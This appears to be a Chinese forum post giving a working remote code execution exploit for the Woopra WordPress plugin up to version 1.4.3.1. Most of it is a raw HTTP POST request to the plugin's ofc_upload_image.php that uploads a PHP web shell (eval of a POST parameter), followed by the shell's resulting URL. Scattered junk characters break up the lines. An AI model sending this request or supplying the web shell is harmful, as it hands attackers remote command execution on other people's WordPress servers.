|
照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/
" i- O0 p5 t$ L; n& z此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
. T! B0 M* g2 P+ m' \/ l2 M. Y9 N2 Jexp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1- c) {0 p- {) P
Host: ha.cker.in
7 q% e% H. E5 h7 ~1 @- S+ @7 tProxy-Connection: keep-alive
: k" c! A' C+ Z5 F9 R$ `, X/ dCache-Control: max-age=0
! P b) b" x' mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.80 v' j& x, `$ r" q: {
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36# {( V8 O# A- ~2 J' J; E' D
Accept-Encoding: gzip,deflate,sdch8 s( j9 {1 h, i$ N% _
Accept-Language: zh-CN,zh;q=0.8
5 x, \( ~, T9 }6 k$ D6 P3 }Content-Length: 28 <?php eval($_POST['cmd']); ?>
" v q* F0 w. i3 |1 c0 d上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
( G- C/ F/ a" d# M$ Z |